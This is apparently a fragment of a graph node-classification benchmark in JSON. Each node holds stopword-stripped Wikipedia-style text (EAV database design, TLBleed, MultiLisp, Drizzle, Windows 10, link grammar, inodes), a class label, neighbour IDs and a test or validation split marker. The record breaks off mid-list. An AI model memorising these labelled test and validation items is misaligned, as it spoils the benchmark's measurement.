domain e.g. clinical medicine necessarily programmers historically one main reasons pre-relational tmr system failed adopted sites home institution metadata stored single file non-intuitive structure customizing system behavior altering contents file without causing system break delicate task system authors trusted eav system implemented rdf rdf schema language may conveniently used express metadata schema information may used eav database engine dynamically re-organize internal table structure best efficiency final caveats regarding metadata validation presentation grouping metadata make possible creation code frameworks support automatic user interface generation data browsing well interactive editing production system delivered web task validation eav data essentially moved back-end/database tier powerless respect task middle /web server tier back-end validation always ideal impossible subvert attempting direct data entry table middle tier validation generic framework quite workable though significant amount software design effort must go building framework first availability open-source frameworks studied modified individual needs go long way avoiding wheel reinvention eav modeling alternative terms generic data modeling open schema long standard tool advanced data modelers like advanced technique double-edged used judiciously also employment eav preclude employment traditional relational database modeling approaches within database schema emrs rely rdbms cerner use eav approach clinical-data subschema vast majority tables schema fact traditionally modeled attributes represented individual columns rather rows modeling metadata subschema eav system fact good fit traditional modeling inter-relationships various components metadata trialdb system example number metadata tables schema outnumber data tables ten one correctness consistency metadata critical correct operation eav system system designer wants take full advantages features rdbmss provide referential integrity programmable constraints rather reinvent rdbms-engine wheel consequently numerous metadata tables support eav designs typically third-normal relational form commercial electronic health record systems ehrs use row-modeling classes data diagnoses surgical procedures performed laboratory test results segregated separate tables table entity composite patient id date/time diagnosis made surgery lab test performed attribute foreign key specially designated lookup table contains controlled vocabulary e.g. icd-10 diagnoses current procedural terminology surgical procedures set value attributes e.g. laboratory-test results one may record value measured whether normal low high range id person responsible performing test date/time test performed stated earlier full-fledged eav approach domain attributes given table restricted domain product ids supermarket sales table would restricted domain products products table however capture data parameters always defined standard vocabularies ehrs also provide pure eav mechanism specially designated power-users define new attributes data type maximum minimal permissible values permissible set values/codes allow others capture data based attributes epic tm ehr mechanism termed flowsheets commonly used capture inpatient nursing observation data typical case using eav model highly sparse heterogeneous attributes clinical parameters electronic medical record emrs stated even however accurate state eav modeling principle applied sub-schema database rather contents patient demographics example naturally modeled one-column-per-attribute traditional relational structure consequently arguments eav vs. relational design reflect incomplete understanding problem eav design employed sub-schema database sparse attributes need modeled even need supported third normal form metadata tables relatively database-design problems sparse attributes encountered circumstances eav design applicable relatively rare even encountered set eav tables way address sparse data xml-based solution discussed applicable maximum number attributes per entity relatively modest total volume sparse data also similarly modest example situation problems capturing variable attributes different product types sparse attributes may also occur e-commerce situations organization purchasing selling vast highly diverse set commodities details individual categories commodities highly variable magento e-commerce software employs eav approach address issue another application eav modeling classes attributes sparse dynamic number data rows per class relatively modest – couple hundred rows typically dozen – system developer also required provide web-based end-user interface within short turnaround time dynamic means new classes attributes need continually defined altered represent evolving data model scenario occur rapidly evolving scientific fields well ontology development especially prototyping iterative refinement phases creation new tables columns represent new category data especially labor-intensive programming web-based interfaces support browsing basic editing type- range-based validation case maintainable long-term solution create framework class attribute definitions stored metadata software generates basic user interface metadata dynamically eav/cr framework mentioned earlier created address situation note eav data model essential system designer may consider acceptable alternative creating say sixty tables containing total two thousand rows number rows per class efficiency considerations less important standard indexing class id/attribute id dbms optimizers easily cache data small class memory running query involving class attribute dynamic-attribute scenario worth noting resource description framework rdf employed underpinning semantic-web-related ontology work rdf intended general method representing information form eav rdf triple comprises object property value end jon bentley book writing efficient programs author warns making code efficient generally also makes harder understand maintain one rush tweak code unless one first determined performance problem measures code profiling pinpointed exact location bottleneck done modify specific code needs run faster similar considerations apply eav modeling apply sub-system traditional relational modeling known priori unwieldy clinical data domain discovered system evolution pose significant maintenance challenges database guru currently vice-president core technologies oracle corporation tom kyte example correctly points drawbacks employing eav traditional business scenarios makes point mere flexibility sufficient criterion employing eav however makes sweeping claim eav avoided circumstances even though oracle health sciences division employs eav model clinical-data attributes commercial systems clintrial oracle clinical achilles heel eav difficulty working large volumes eav data often necessary transiently permanently inter-convert columnar row-or eav-modeled representations data error-prone done manually well cpu-intensive generic frameworks utilize attribute attribute-grouping metadata address former latter limitation use less mandated case mixed schemas contain mixture conventional-relational eav data error quotient significant conversion operation called pivoting pivoting required eav data also form row-modeled data example implementations apriori algorithm association analysis widely used process supermarket sales data identify products purchasers given product also likely buy pivot row-modeled data first step many database engines proprietary sql extensions facilitate pivoting packages microsoft excel also support circumstances pivoting necessary considered however structure eav data model perfect candidate relational division see relational algebra good indexing strategy possible get response time less hundred milliseconds billion row eav table microsoft sql server mvp peter larsson proved laptop made solution general available obviously matter approaches take querying eav fast querying standard column-modeled relational data certain types query much way access elements sparse matrices fast non-sparse matrices latter fit entirely main memory sparse matrices represented using structures linked lists require list traversal access element given x-y position access elements matrices represented 2-d arrays performed using fast cpu register operations however chose eav approach correctly problem trying solve price pay respect eav modeling example space schema maintenance versus cpu-time tradeoff originally postulated maier ullman vardi universal data model udm seeks simplify query complex relational schema naive users creating illusion everything stored single giant universal table utilizing inter-table relationships user need concerned table contains attribute c.j date however pointed circumstances table multiply related another genealogy databases individual father mother also individuals business databases addresses stored centrally organization different office addresses shipping addresses insufficient metadata within database schema specify unambiguous joins udm commercialized sap businessobjects limitation worked around creation universes relational views predefined joins sets tables universe developer disambiguates ambiguous joins including multiply-related table view multiple times using different aliases apart way data explicitly modeled udm simply uses relational views intercede user database schema eav differs universal data models also applies transactional systems query oriented read-only systems udm also used basis clinical-data query systems eav implementations necessarily shield user specify class object interest eav-based i2b2 clinical data mart example user searches term option specifying category data user interested example phrase lithium refer either medication used treat bipolar disorder laboratory assay lithium level patient blood blood level lithium must monitored carefully much drug causes severe side effects little ineffective open schema implementation use xml column table capture variable/sparse information similar ideas applied databases support json-valued columns sparse hierarchical data represented json database json support postgresql partially sql server 2016 later attributes queried indexed joined offer performance improvements 1000x naive eav implementations. necessarily make overall database application robust note two ways xml json data stored one way store plain string opaque database server way use database server see structure obviously severe drawbacks storing opaque strings queried directly one form index based contents impossible perform joins based content building application manage data gets extremely complicated using eav models extent infrastructure developed terms metadata tables application-framework code using xml solves problem server-based data validation must done middle-tier browser-based code eav-based frameworks following drawbacks drawbacks remediable creating layer metadata application code creating original advantage create framework vanished fact modeling sparse data attributes robustly hard database-application-design problem matter storage approach used sarka work however proves viability using xml field instead type-specific relational eav tables data-storage layer situations number attributes per entity modest e.g. variable product attributes different product types xml-based solution compact eav-table-based one xml may regarded means attribute-value data representation though based structured text rather relational tables exist several approaches representation tree-structured data xml json formats nested set model relational database hand database vendors begun include json xml support data structures query features like ibm db2 xml data stored xml separate tables using xpath queries part sql statements postgresql json data type indexed queried developments accomplish improve substitute eav model approach noted however uses json xml necessarily use eav model though overlap xml preferable eav arbitrarily hierarchical data relatively modest volume single entity intended scale multi-gigabyte level respect data-manipulation performance xml concerned per-se sparse-attribute problem data model underlying information represented decomposed straightforwardly relational structure xml better suited means data interchange primary storage mechanism eav stated earlier specifically applicable sparse-attribute scenario scenario holds use datatype-specific attribute-value tables indexed entity attribute value manipulated simple sql statements vastly scalable use xml tree structure google app engine mentioned uses strongly-typed-value tables good reason alternative approach managing various problems encountered eav-structured data employ graph database represent entities nodes graph hypergraph attributes links edges graph issue table joins addressed providing graph-specific query languages apache tinkerpop opencog atomspace pattern matcher postgresql version 9.4 includes support json binary columns jsonb queried indexed joined allows performance improvements factors thousand traditional eav table designs db schema based jsonb always less tables one may nest attribute-value pairs jsonb type fields entity table makes db schema easy comprehend sql queries concise programming code manipulate database objects abstraction layer turns much shorter microsoft sql server 2008 offers proprietary alternative eav columns atomic data type e.g. numeric varchar datetime columns designated sparse simply including word sparse column definition create table statement sparse columns optimize storage null values take space useful majority records table null values column indexes sparse columns also optimized rows values indexed addition contents sparse columns particular row table collectively aggregated single xml column column set whose contents form codice_1 fact column set defined table part create table statement sparse columns subsequently defined typically added interesting consequence sql statement codice_2 return individual sparse columns concatenate single xml column whose name column set therefore acts virtual computed column sparse columns convenient business applications product information applicable attributes highly variable depending product type total number variable attributes per product type relatively modest however approach modeling sparse attributes several limitations rival dbmss notably chosen borrow idea engines limitations include many cloud computing vendors offer data stores based eav model arbitrary number attributes associated given entity roger jennings provides in-depth comparison amazon offering simpledb data type limited strings data intrinsically non-string must coerced string e.g. numbers must padded leading zeros wish perform operations sorting microsoft offering windows azure table storage offers limited set data types byte bool datetime double guid int long string google app engine offers greatest variety data types addition dividing numeric data int long float also defines custom data types phone number e-mail address geocode hyperlink google amazon microsoft lets define metadata would prevent invalid attributes associated particular class entity letting create metadata model google lets operate data using subset sql microsoft offer url-based querying syntax abstracted via linq provider amazon offer limited syntax concern built-in support combining different entities joins currently april '10 non-existent three engines operations performed application code may concern application servers co-located data servers vendor data center lot network traffic would generated two geographically separated eav approach justified attributes modeled numerous sparse data captured meet requirement cloud vendors default eav approach often mismatch applications require true back-end database opposed merely means persistent data storage retrofitting vast majority existing database applications use traditional data-modeling approach eav-type cloud architecture would require major surgery microsoft discovered example database-application-developer base largely reluctant invest effort recently therefore microsoft provided premium offering – cloud-accessible full-fledged relational engine sql server azure allows porting existing database applications modest changes one limitation sql azure physical databases limited 500gb size microsoft recommends data sets larger split multiple physical databases accessed parallel queries",
    "neighbors": [
      2688,
      5632,
      3462,
      10632,
      8201,
      2059,
      9631,
      1697,
      10145,
      11683,
      7076,
      7080,
      10921,
      9397,
      4155,
      7868,
      9147,
      11324,
      11457,
      6085,
      9286,
      10693,
      2512,
      10452,
      2901,
      7767,
      11098,
      8539,
      479,
      4065,
      4194,
      7650,
      7780,
      9828,
      6502,
      10471,
      2024,
      6770,
      4598,
      1146,
      6395,
      3196
    ],
    "mask": "Test"
  },
  {
    "node_id": 8292,
    "label": 4,
    "text": "TLBleed:tlbleed tlbleed cryptographic side-channel attack uses machine learning exploit timing side-channel via translation look-aside buffer tlb modern microprocessors use simultaneous multithreading attack demonstrated experimentally intel processors speculated processors may also potentially vulnerable variant attack proof concept demonstrated recent news amd indicates processors vulnerable attack attack led openbsd project disabling simultaneous multithreading intel microprocessors openbsd project leader theo de raadt stated attack could theoretically addressed preventing tasks different security contexts sharing physical cores fix currently impractical complexity problem",
    "neighbors": [
      1024,
      5636,
      4117,
      8726,
      535,
      9761,
      4644,
      4133,
      7218,
      1608,
      3657,
      8779,
      8273,
      4703,
      8288,
      10875,
      3711,
      8320,
      5764,
      2187,
      4240,
      1688,
      2717,
      9375,
      9904,
      9395,
      8886,
      3789,
      4304,
      4314,
      9435,
      4830,
      3807,
      5349,
      1254,
      10477,
      9460,
      7418,
      2815,
      3843,
      10502,
      10003,
      4389,
      297,
      2857,
      8489,
      11052,
      9518,
      1337,
      6484,
      857,
      1882,
      7515,
      3956,
      9082,
      11152,
      10132,
      1440,
      5024,
      5028,
      11175,
      5547,
      7601,
      1970,
      441,
      1979,
      4027,
      9664,
      8133,
      4054,
      7639,
      8664,
      1504,
      9186,
      2542,
      507,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 8293,
    "label": 9,
    "text": "MultiLisp:multilisp multilisp functional programming language dialect language lisp dialect scheme extended constructs parallel computing execution shared memory extensions involve side effects rendering multilisp nondeterministic along parallel-programming extensions multilisp also unusual garbage collection task scheduling algorithms like scheme multilisp optimized symbolic computing unlike parallel programming languages multilisp incorporated constructs causing side effects explicitly introducing parallelism designed robert h. halstead jr. early 1980s use 32-processor concert multiprocessor developed massachusetts institute technology mit implemented interlisp influenced development scheme dialects gambit interlisp-vax multilisp achieves parallelism pcall macro codice_1 equivalent codice_2 except arguments codice_3 etc explicitly allowed evaluated parallel circumvents usual order evaluation sequential left right also makes use parallel programming construct called futures resembles forking combined lazy evaluation using construct expression codice_4 written overlap evaluation expressions b computations use result cons call operation performed needs correct information value b",
    "neighbors": [
      10752,
      4101,
      11269,
      2056,
      9224,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      2666,
      8815,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      5803,
      2225,
      7867,
      4799,
      7880,
      8908,
      205,
      2253,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      10555,
      10571,
      3408,
      6994,
      11604,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      6536,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      7670,
      11255
    ],
    "mask": "None"
  },
  {
    "node_id": 8294,
    "label": 7,
    "text": "Apache_Tajo:apache tajo apache tajo big data relational distributed data warehouse system apache hadoop designed tajo targeting low-latency scalable ad-hoc queries online aggregation etl feature follows sample statement create sql table may look like follows",
    "neighbors": [
      10377,
      6797,
      7567,
      1296,
      1047,
      8217,
      11161,
      6555,
      8860,
      3877,
      10661,
      11303,
      7983,
      823,
      4919,
      5047,
      4538,
      1851,
      7485,
      7742,
      9789,
      7233,
      6338,
      1222,
      1991,
      4294,
      7750,
      5066,
      8139,
      4944,
      1363,
      8408,
      9179,
      7261,
      990,
      8799,
      10719,
      865,
      11235,
      11111,
      8425,
      8810,
      747,
      2163,
      7159,
      1913
    ],
    "mask": "None"
  },
  {
    "node_id": 8295,
    "label": 1,
    "text": "Drizzle_(database_server):drizzle database server drizzle abandoned free software/open-source relational database management system dbms forked now-defunct 6.0 development branch mysql dbms like mysql drizzle client/server architecture uses sql primary command language old drizzle files distributed version 2 3 gnu general public license gpl portions including protocol drivers replication messaging bsd license early work fork done mid-2008 brian aker ongoing development handled team contributors includes staff members canonical ltd. google six apart sun microsystems rackspace data differential blue gecko intel percona hewlett-packard red hat others drizzle source code along instructions compiling available via project launchpad website october 2010 drizzle 13,478 total contributions 96 total contributors 37 active contributors also announced drizzle entered beta first ga version released march 2011 drizzle actively participated google summer code project since 2010 drizzle targeted web-infrastructure cloud computing markets developers product describe smaller slimmer hopefully faster version mysql drizzle written c++ programming language stores string data utf-8 format developed modern unix-like operating systems including linux freebsd mac os x solaris – general os conforms posix working implementation gnu autotools microsoft windows supported time mainly lack autotools support discussion accomplish sensible manner drizzle re-designed version mysql v6.0 codebase designed around central concept microkernel architecture features query cache authentication system plugins database follow general theme pluggable storage engines introduced mysql 5.1 supports pam ldap http auth authentication via plugins ships via plugin system currently supports logging files syslog remote services rabbitmq gearman drizzle acid-compliant relational database supports transactions via mvcc design plugin points added support replication storage engines query rewrite table functions user-defined functions protocol adapters multiple query caches like mysql drizzle supports concurrent multiple engines via drizzle includes built-in support b+ tree hash indexes drizzle query planner capable using multiple indexes multiple engines satisfy complex queries using temporary in-memory bitmap index operations database triggers drizzle supported dml ddl number additional event-based operations server primebase blob streaming system allows drizzle stream binary large objects blobs via http makes use system triggers drizzle currently must written c++ query matched rewritten dynamically sent server action done parsing occurs wide variety native data types supported including support execute command drizzle operate dynamic multi-statement sql via keyword concurrent operate statements parallel replication drizzle done generating messages using google protocol buffers library messages stored executed remote servers message format non-sql neutral format allowed drizzle replication appliers rabbitmq memcached mysql voldemort apache cassandra drizzle licensed version two three gpl parts libdrizzle client library bsd license",
    "neighbors": [
      11392,
      6273,
      8195,
      5384,
      6797,
      10258,
      7187,
      3221,
      5397,
      5399,
      10389,
      1049,
      7453,
      1950,
      9503,
      10145,
      2339,
      7339,
      10413,
      7983,
      9010,
      5047,
      823,
      5433,
      10048,
      6721,
      9665,
      5964,
      5198,
      1232,
      7506,
      9687,
      9177,
      8539,
      2780,
      10459,
      2143,
      4194,
      3045,
      6245,
      9320,
      3819,
      5612,
      2413,
      7022,
      8683,
      8304,
      9455,
      6770,
      3188,
      4598,
      10873,
      2810
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8296,
    "label": 2,
    "text": "Features_new_to_Windows_10:features new windows 10 windows 10 introduced number new elements including option use touch-optimized interface known tablet mode traditional desktop interface similar windows 7 along live tiles windows 8 however unlike previous versions windows major features release completed rtm windows 10 continues receive major features changes beyond initial release market microsoft describes windows 10 'operating system service receive ongoing updates features functionality supplemented ability enterprise environments receive non-critical updates slower pace use long-term support milestones receive critical updates security patches ten-year lifespan support terry myerson executive vice president microsoft windows devices group argued goal model reduce fragmentation across windows platform windows 10 codenamed threshold 1 first release windows 10 carries build number 10.0.10240 build n't contain version number microsoft retroactively named version 1507 standing july 2015 matching versioning scheme later updates threshold 1 announced event september 30 2014 first preview following day final release made available windows insiders july 15 2015 followed public release july 29 2015 free upgrade windows 7 windows 8.1 threshold 1 release windows 10 supported users long term servicing branch ltsb new feature indicated release added since windows 8.1 update 1 released april 2014 mail app adds user-configurable swipe gesture controls pop3 email support google calendar support added calendar app settings app expanded similar functionality control panel albeit metro-style user interface map app download maps offline use microsoft edge new browser windows 10 successor internet explorer although internet explorer remain compatibility legacy purposes cortana integrated edge accessible option ask cortana right click menu well reading view ability write notes directly web pages save onenote reading list feature also added users save articles content accessed read later microsoft edge also includes share button toolbar tapping clicking bring system share panel users able share webpage installed applications reading list third-party apps facebook twitter since release microsoft edge scored 402 555 points html5test windows 10 introduced universal windows platform uwp extension windows runtime platform originally introduced windows 8 uwp emphasizes core set apis common variations operating system enabling ability code single application adaptations user interface differences different device families states including desktops laptops tablets smartphones via windows 10 mobile xbox one new device classes surface hub hololens application may also react available displays input device connected monitor suitable docking station uwp app smartphone take appearance app pc information also synchronized versions app different devices notifications licensing windows 10 includes directx 12 alongside wddm 2.0 unveiled march 2014 gdc directx 12 aims provide console-level efficiency closer metal access hardware resources reduced cpu graphics driver overhead performance improvements achieved low-level programming reduce single-threaded cpu bottlenecking caused abstraction higher level apis performance gains achieved allowing developers direct access gpu resources similar low-level rendering initiatives amd mantle apple metal api opengl successor vulkan wddm 2.0 introduces new virtual memory management allocation system reduce workload kernel-mode driver windows 10 brings updates xbox app introduced windows 8 games xbox one streamed windows 10 device excluding smartphones windows 10 introduces game bar provides screenshot video capture functionality windows games users invoke game bar record gameplay take screenshot using appropriate keyboard shortcuts windows 10 also continuously capture gameplays background allows user request last users defined moments gameplay saved hard disk useful user wants save and/or share moment gameplay think explicitly record beforehand windows 10 also allows web apps desktop software using either win32 .net framework packaged distribution windows store desktop software distributed windows store packaged using app-v system allow sandboxing web apps executed remote servers access windows functions notifications camera access windows 8 locally packaged web apps written using html winjs called action center windows 7 windows server 2008 r2 successor called security maintenance title action center windows 10 usurped sidebar provides list received notifications group quick actions buttons different settings areas accessed clicking notifications icon system tray swiping right screen touchscreens windows 10 brings improvements system command-line interface unlike previous versions windows nt win32 console windows resized without restrictions made cover full screen pressing combination keyboard microsoft also enabled use standard keyboard shortcuts cut copy paste within console word wrapping keyboard shortcuts move caret select manipulate text become available features word wrap transparency also included user option disable new features return legacy console wish continuum blanket title group features windows 10 designed enable smoother transitions default interface mode designed use keyboard mouse interface designed touchscreen environments especially hybrid devices laplets enabling tablet mode switches primary interface full screen version start menu opens applications maximized view default taskbar also modified adding back button next start button default hiding buttons opened pinned applications task view used primary means switching programs windows prompt switch two modes automatically certain events occur plugging keyboard mouse tablet switching laplet laptop state vice versa windows 10 brought cortana assistant windows phone 8.1 windows 10 default cortana appears search pane taskbar changed button like tablet mode activated voice using command hey cortana user searches start menu user searches cortana search pane cortana users ask cortana questions weather calendar events types notifications along online information cortana currently requires microsoft account function windows 10 reintroduced start menu seen versions windows prior 8 however unlike versions new start menu includes live tile features windows 8 possible resize start menu view recently added used applications also made full screen tablet users users prefer windows 8-like experience right hand side start menu used pin tiles menu contain limited amount columns depending screen resolution columns divided groups title every group divided 6 8 columns depending user settings allow either 6 8 small sized tiles next task view task switching virtual desktop system accessible via taskbar button keyboard shortcut swiping left touchscreen activating task view shows zoomed display windows currently opened specific monitor clicking window switches task view also displayed window snapped half screen three windows snapped fourths screen prompting window occupy remainder screen task view also allows creation virtual workspaces windows dragged workspaces modern settings app windows 8 continues evolve windows 10 incorporating system setting configuration functionality windows control panel ultimate goal make settings app feature complete obviating need control panel push-button reset function changed utilize files current windows installation rebuild system rather separate recovery image system updates carry new installation re-downloaded separate refresh option removed users given explicit choices within reset process remove personal files applications keep personal files remove applications perform full factory reset mac address randomization wifi introduced try prevent third parties using mac address track devices windows 10 november update windows 10 version 1511 codenamed threshold 2 first major update windows 10 carries build number 10.0.10586 version 1511 referencing date release november 2015 first preview released august 18 2015 final release made available windows insiders november 3 2015 followed public release november 12 2015 existing windows 10 users free upgrade windows 7 windows 8.1 unlike initial release windows branch also made available existing windows phone 8.1-devices xbox one preview release windows server 2016 pre-installed new windows 10 mobile-devices like microsoft lumia 950 threshold 2 release windows 10 supported users current branch businesses cbb changes highlight features new since threshold 1 release windows 10 windows 10 anniversary update windows 10 version 1607 codenamed redstone 1 second major update windows 10 first 2 major updates given redstone codename released july 29 2016 universal windows platform apps support extensions allowing add-ons dlcs apps games respectively furthermore add-ons managed windows settings app anniversary update windows 10 adds windows subsystem linux allows ubuntu user space run natively windows subsystem translate linux system call ubuntu uses windows nt kernel allows bash ubuntu command line apps run within windows console however interoperability restriction bash run windows apps windows run linux software project centennial allows win32 .net apps repackaged appx allow use full set windows runtime apis also allow apps distributed windows store new workspace environment pen users includes virtual sticky notes pen could used take notes sticky notes features optical character recognition ocr highlight relevant text used cortana workspace also includes sketchpad ability take screenshot draw virtual ruler windows 10 creators update windows 10 version 1703 codenamed redstone 2 feature update windows 10 slated released april 11 2017 first preview release seeded windows insiders august 11 2016 redstone 2 release windows 10 currently development branch available windows insiders changes highlights features new since redstone 1 release windows 10 april 2018 update windows 10 version 1803 fifth feature update windows 10 windows 10 october 2018 update windows 10 version 1809 sixth feature update windows 10",
    "neighbors": [
      11283,
      3100,
      3102,
      8740,
      11301,
      6697,
      1581,
      2101,
      576,
      582,
      1098,
      6221,
      4178,
      8798,
      10338,
      5225,
      8299,
      9839,
      9331,
      7796,
      6265,
      8315,
      636,
      639,
      641,
      651,
      6797,
      10896,
      2196,
      10388,
      10900,
      7847,
      3250,
      9910,
      2749,
      10957,
      2777,
      3289,
      4316,
      5857,
      4326,
      9448,
      10989,
      1776,
      11519,
      11524,
      8976,
      10512,
      11546,
      10016,
      3881,
      6441,
      3890,
      6972,
      6462,
      321,
      9033,
      11605,
      2391,
      11103,
      2919,
      4458,
      364,
      4972,
      5492,
      8576,
      3462,
      3463,
      8080,
      6034,
      4505,
      10658,
      4515,
      3496,
      430,
      7615,
      7106,
      467,
      9173,
      5600,
      4074,
      5103,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8297,
    "label": 0,
    "text": "Link_grammar:link grammar link grammar lg theory syntax davy temperley daniel sleator builds relations pairs words rather constructing constituents phrase structure hierarchy link grammar similar dependency grammar dependency grammar includes head-dependent relationship whereas link grammar makes head-dependent relationship optional links need indicate direction colored multiplanar link grammar cmlg extension lg allowing crossing relations pairs words relationship words indicated link types thus making link grammar closely related certain categorial grammars example subject–verb–object language like english verb would look left form subject link right form object link nouns would look right complete subject link left complete object link subject–object–verb language like persian verb would look left form object link distant left form subject link nouns would look right subject object links link grammar connects words sentence links similar form catena unlike catena traditional dependency grammar marking head-dependent relationship optional languages becoming mandatory free-word-order languages turkish finnish hungarian lithuanian english subject-verb relationship obvious subject almost always left verb thus specific indication dependency needs made case subject-verb inversion distinct link type employed free word-order languages longer hold link subject verb must contain explicit directional arrow indicate two words link grammar also differs traditional dependency grammars allowing cyclic relations words thus example links indicating head verb sentence head subject sentence well link subject verb three links thus form cycle triangle case cycles useful constraining might otherwise ambiguous parses cycles help tighten set allowable parses sentence example parse left-wall indicates start sentence root node directional wv link arrows points head verb sentence wall-verb link wd link drawn without arrows indicates head noun subject sentence link type wd indicates connects wall w sentence declarative sentence lower-case subtype ss link indicates subject-verb relationship lower-case indicating subject singular note wv wd ss links cycle pa link connects verb complement lower-case indicating predicative adjective case parsing performed analogy assembling jigsaw puzzle representing parsed sentence puzzle pieces representing individual words language represented means dictionary lexis consists words set allowed jigsaw puzzle shapes word shape indicated connector link-type direction indicator indicating right left thus example transitive verb may connectors s- o+ indicating verb may form subject connection left object connection right similarly common noun may connectors d- s+ indicating may connect determiner left d- act subject connecting verb right s+ act parsing identify s+ connector attach s- connector forming link two words parsing completes connectors connected given word may dozens even hundreds allowed puzzle-shapes termed disjuncts example many verbs may optionally transitive thus making o+ connector optional verbs might also take adverbial modifiers e connectors inherently optional complex verbs may additional connectors indirect objects particles prepositions thus part parsing also involves picking one single unique disjunct word final parse must satisfy connect connectors disjunct connectors may also include head-dependent indicators h d. case connector containing head indicator allowed connect connector containing dependent indicator connector without h-d indicators indicators used link decorated arrows indicate link direction recent extension simplifies specification connectors languages little restrictions word-order lithuanian also extensions make easier support languages concatenative morphologies parsing algorithm also requires final graph planar graph i.e links cross constraint based empirical psycho-linguistic evidence indeed languages nearly situations dependency links really cross rare exceptions e.g finnish even english parsed link-grammar introducing complex selective connector types capture situations connectors optional floating-point cost markup cheaper use others thus giving preference certain parses others total cost parse sum individual costs connectors used cheapest parse indicates likely parse used parse-ranking multiple ambiguous parses fact costs local connectors global property algorithm makes essentially markovian nature assignment log-likelihood linkages allows link grammar implement semantic selection predicate-argument relationships certain constructions although syntactically valid extremely unlikely way link grammar embodies ideas present operator grammar costs additive behave like logarithm probability since log-likelihoods additive equivalently somewhat like entropy since entropies additive makes link grammar compatible machine learning techniques hidden markov models viterbi algorithm link costs correspond link weights markov networks bayesian networks link grammar link types understood types sense type theory effect link grammar used model internal language certain non-symmetric compact closed categories pregroup grammars sense link grammar appears isomorphic homomorphic categorial grammars thus example categorial grammar noun phrase bad boy may written whereas corresponding disjuncts link grammar would contraction rules inference rules lambek calculus mapped connecting connectors link grammar directional indicators correspond forward backward-slashes categorical grammar finally single-letter names understood labels easy-to-read mnemonic names rather verbose types np/n etc primary distinction categorical grammars two type constructors forward backward slashes used create new types np/n base types np n link-grammar omits use type constructors opting instead define much larger set base types compact easy-to-remember mnemonics basic rule file svo language might look like thus english sentence boy painted picture would appear similar parses apply chinese conversely rule file null subject sov language might consist following links simple persian sentence man nan xordam من نان خوردم ate bread would look like vso order likewise accommodated arabic many languages concatenative morphology stem plays grammatical role grammar determined suffixes thus russian sentence 'вверху плыли редкие облачка might parse subscripts '.vnndpp used indicate grammatical category primary links wd ei sip api connect together suffixes principle stems could appear without altering structure sentence api link indicates adjective sip denotes subject-verb inversion ei modifier wd link used indicate head noun head verb indicated sentence llxxx links serve attach stems suffixes link-grammar also indicate phonological agreement neighboring words example connector 'ph used constrain determiners appear word 'abstract effectively blocks makes costly use determiner sentence link 'an becomes cheap links roughly previous examples denoting subject denoting object denoting determiner 'wv link indicates head verb w link indicates head noun lower-case letters following upper-case link types serve refine type example ds connect singular noun ss singular subject os singular object lower-case v phv denotes 'vowel lower-case wd denotes declarative sentence vietnamese language sentence bữa tiệc hôm qua là một thành công lớn party yesterday great success may parsed follows link grammar syntax parser library natural language processing written c. available lgpl license parser ongoing project recent versions include improved sentence coverage russian persian arabic language support prototypes german hebrew lithuanian vietnamese turkish programming api python java common lisp autoit ocaml 3rd-party bindings perl ruby javascript node.js current major undertaking project learn grammar morphology new languages using unsupervised learning algorithms link-parser program along rules word lists english may found standard linux distributions e.g. debian package although many years date abiword free word processor uses link grammar on-the-fly grammar checking words linked anywhere underlined green semantic relationship extractor relex layered top link grammar library generates dependency grammar output making explicit semantic relationships words sentence output classified level ssyntr dsyntr meaning-text theory also provides framing/grounding anaphora resolution head-word identification lexical chunking part-of-speech identification tagging including entity date money gender etc tagging includes compatibility mode generate dependency output compatible stanford parser penn treebank-compatible pos tagging link grammar also employed information extraction biomedical texts events described news articles well experimental machine translation systems english german turkish indonesian farsi link grammar link dictionary used generate verify syntactic correctness three different natural language generation systems nlgen nlgen2 microplanner/surreal also used part nlp pipeline opencog ai project",
    "neighbors": [
      7780,
      4070,
      3462,
      2440,
      8582,
      8554,
      10890,
      5612,
      5677,
      7343,
      7983,
      9245,
      10610,
      2804,
      7164,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8298,
    "label": 6,
    "text": "Inode:inode inode index node data structure unix-style file system describes file-system object file directory inode stores attributes disk block location object data file-system object attributes may include metadata times last change access modification well owner permission data directories lists names assigned inodes directory contains entry parent children uncertainty linux kernel mailing list reason inode 2002 question brought unix pioneer dennis ritchie replied paper published 1978 ritchie ken thompson strongly suggests etymology also maurice j. bach writes file system relies data structures files beside file content former called metadata —data describes data file associated inode identified integer number often referred i-number inode number inodes store information files directories folders file ownership access mode read write execute permissions file type many types file system implementations maximum number inodes fixed file system creation limiting maximum number files file system hold typical allocation heuristic inodes file system one percent total size inode number indexes table inodes known location device inode number kernel file system driver access inode contents including location file thus allowing access file file inode number found using codice_1 command codice_1 command prints i-node number first column report unix-style file systems reiserfs omit inode table must store equivalent data order provide equivalent capabilities data may called stat data reference codice_3 system call provides data programs file names directory implications operating system kernel in-memory representation data called codice_4 linux systems derived bsd use term codice_5 v vnode referring kernel virtual file system layer posix standard mandates file-system behavior strongly influenced traditional unix file systems inode denoted phrase file serial number defined per-file system unique identifier file file serial number together device id device containing file uniquely identify file within whole system within posix system file following attributes may retrieved codice_3 system call make sense store small files inode save space data block needed look-up time disk access needed file system feature called inlining strict separation inode file data thus longer assumed using modern file systems data file fits space allocated pointers data space conveniently used example ext2 successors stores data symlinks typically file names way data 60 bytes fast symbolic links ext4 file system option called inline_data enabled file system creation allows ext4 perform inlining inode size limited works small files",
    "neighbors": [
      2560,
      2564,
      6155,
      7187,
      8214,
      10774,
      10776,
      25,
      4637,
      9762,
      4643,
      6180,
      2597,
      7217,
      10803,
      10809,
      576,
      2625,
      8772,
      6221,
      3160,
      10333,
      97,
